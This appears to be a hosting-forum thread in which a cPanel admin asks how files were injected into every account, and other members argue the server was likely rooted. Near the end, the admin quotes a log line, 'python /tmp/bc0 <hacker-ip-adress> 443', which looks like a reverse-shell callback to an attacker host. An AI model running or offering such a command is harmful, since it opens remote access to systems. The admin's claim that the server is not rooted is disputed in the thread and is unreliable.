Websites Hacked

[abdelhost77]

someone did inject :
-rw-r--r-- 1 root root index.htm

in the public_html of all the accounts in the server , even if i have :

Last Cpanel release
Kernel patched
/tmp secured
suphp
patch avoid Symlink
Firewall CSF&LFD
Mod security


any one have an idea how this can be done with all security stuffs above ?
It is crritical please

thanks a lot

 

[abdelhost77]

I think it was a python or perl scrript ,

can we deactivate Python or perl script from been used by apache ?

for example to remove :
AddHandler cgi-script .cgi .pl .plx .ppl .perl

From httpd.conf ?

 

[simonas]

Disable cgi in the package.

 

[nospa]

How did you find that this was a perl script executed via apache? Permissions are root:root so it might be a root compromise.

 

[abdelhost77]

Thanks for your feedback

no am sure it was not a root compromise because the attacker was just able to inject index.htm file

i think he use some php functions such as "chown" , "chmod" , to change owneship file , and "fsockopen" php functions to inject file .

I did add thoses functions to disable_php

In logs we found :

CSF Logs :
python /tmp/bc0


SUEXEC Logs :
cmd: python.izo
cmd: shell.izo



But /tmp is secured so no execution rights .

Im still not 100% sure how he does that .

 

[quietFinn]

Only root can create root-owned files, or change the owner to root.

Your box is rooted. It's practically impossible to clean it without reloading the OS.

 

[abdelhost77]

thanks QuiedtFinn

But i dont think so , the root password has not been changed by the Attacker

and also , the PHP hack scripts were launched from one cpanel account that waas using joomla and which acccount was hacked than putting some PHP hacks scripts .

but once i suspend that cpanel account , the attacker was unable to do the same .

actually i add some suspicious PHP functions to disable_functions in php.ini

hope this fix the issue .

 

[cPanelMichael]

Hello

I have to agree that at the very least, this type of activity warrants an investigation by a qualified system administrator to determine if the server has been rooted. It's a good idea to consult with a qualified system administrator or security specialist if your system has been exploited and you have little experience with security. Some companies list their services for this in the cPanel application catalog:

cPanel Application Catalog - System Administration Services

Thank you.

 

[brianoz]

If disabling one Joomla account stopped the activity perhaps it wasn't a root compromise.

However, as far as I know the chown() call only works for root, so that doesn't sound good. You're confused about the root password; it's not required to exploit a system. Sure, sometimes the exploiters change the root password, but as that tends to make it very obvious that they have access, they nearly always leave it alone.

Likely as a newbie admin you won't be able to solve this one on your own, you probably want to seek some skilled help.

 

[JaredR.]

But i dont think so , the root password has not been changed by the Attacker

When an attacker compromises a server, the attacker usually wants to avoid drawing the attention of the legitimate owner of the server, because the legitimate owner at that point would probably reinstall the operating system and harden it, making the attacker's work for naught. An attacker changing the root password would be a sure way to catch the attention of the legitimate owner. Because of that, the fact that the root password has not changed does not mean that the server is not root compromised.

You need to get a qualified security expert to look at your server, and you need to seriously consider making sure you have good backups of your data, reformatting the hard drive and reinstalling the operating system and cPanel, and restoring your backed-up data.

 

[abdelhost77]

When an attacker compromises a server, the attacker usually wants to avoid drawing the attention of the legitimate owner of the server, because the legitimate owner at that point would probably reinstall the operating system and harden it, making the attacker's work for naught. An attacker changing the root password would be a sure way to catch the attention of the legitimate owner. Because of that, the fact that the root password has not changed does not mean that the server is not root compromised.

You need to get a qualified security expert to look at your server, and you need to seriously consider making sure you have good backups of your data, reformatting the hard drive and reinstalling the operating system and cPanel, and restoring your backed-up data.

We have Many servers , and the one who was hacked was freshly installed so i think we did forgot to secure /tmp , and "anonymous FTP" was also activated , so i think some of this two , or both , things has been used to compromise the server . like a perl script executed from /tmp who is using anonymous FTP acces to inject index.htm file in all public_html accounts . But im sure it is not a root compromise .

In fact , if i take a root:root file form server1 and send it by Anonymous FTP to server2 , the owner of the file in server2 will be root:root ?

 

[JaredR.]

Rooting a server does not require a highly skilled hacker. There is a reason for the word "rootkit" - it is a kit that does not require skills.

It is your server, so you are free to do whatever you want, but the fact that the root password was not changed does not mean the server was not rooted. Typically, once a perpetrator roots a server, he wants to keep control of it as long as possible, and changing the root password would definitely get the server administrator's attention, so usually the root password is not changed.

You can either reformat and reinstall and know that the server is not compromised, or you can pick and choose evidence that supports the idea that it is not compromised. You have been given a lot of good advice in this thread, but what you do with it is entirely your responsibility.

 

[JaredR.]

In fact , if i take a root:root file form server1 and send it by Anonymous FTP to server2 , the owner of the file in server2 will be root:root ?

No. The owner of the file will be the anonymous FTP user. This is not proof that your server is not rooted.

 

[Serra]

If disabling one Joomla account stopped the activity perhaps it wasn't a root compromise.

To say that the box was not access because the account was disabled doesn't prove the hacker no longer has access. Absence of proof it not itself proof. The hacker might just be slow to update their script or hasn't got back to attacking the box again.

 

[stdout]

Rooting a server does not require a highly skilled hacker. There is a reason for the word "rootkit" - it is a kit that does not require skills.

It is your server, so you are free to do whatever you want, but the fact that the root password was not changed does not mean the server was not rooted. Typically, once a perpetrator roots a server, he wants to keep control of it as long as possible, and changing the root password would definitely get the server administrator's attention, so usually the root password is not changed.

You can either reformat and reinstall and know that the server is not compromised, or you can pick and choose evidence that supports the idea that it is not compromised. You have been given a lot of good advice in this thread, but what you do with it is entirely your responsibility.

Nicely put.

 

[brianoz]

To say that the box was not access because the account was disabled doesn't prove the hacker no longer has access. Absence of proof it not itself proof. The hacker might just be slow to update their script or hasn't got back to attacking the box again.

I know that for a non-native English speaker the meaning of the word "perhaps" might not be clear; it actually means fairly much the opposite of "proves". Also worth reading the rest of the message in which I say he should get skilled help. The sentence was discussing whether the box had a root-level compromise or not, which is quite different from whether a hacker might come back or not. The fact that the exploit stopped once the account was disabled is suggestive of it not being a root hack. Regardless, more forensic examination of the box is required; if file ownership was changed then it sounds like the box was hacked.

(And yes, what you say is of course entirely true, once rooted always rooted; if in fact he has been rooted)

 

[abdelhost77]

In fact i think the reason is that /tmp was not enough secured because we found in CSF logs :

Executable:

/usr/bin/python

Command Line (often faked in exploits):

python /tmp/bc0 <hacker-ip-adress> 443

it seems to be some Python rootkit script .

 

[24x7server]

Hello,

You will have to mount your /tmp with nosuid,noexec,nodev options

 

[abdelhost77]

Hello,

You will have to mount your /tmp with nosuid,noexec,nodev options

YEs sure , actually it is
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)

But i was talking about the reason how the server got compromised.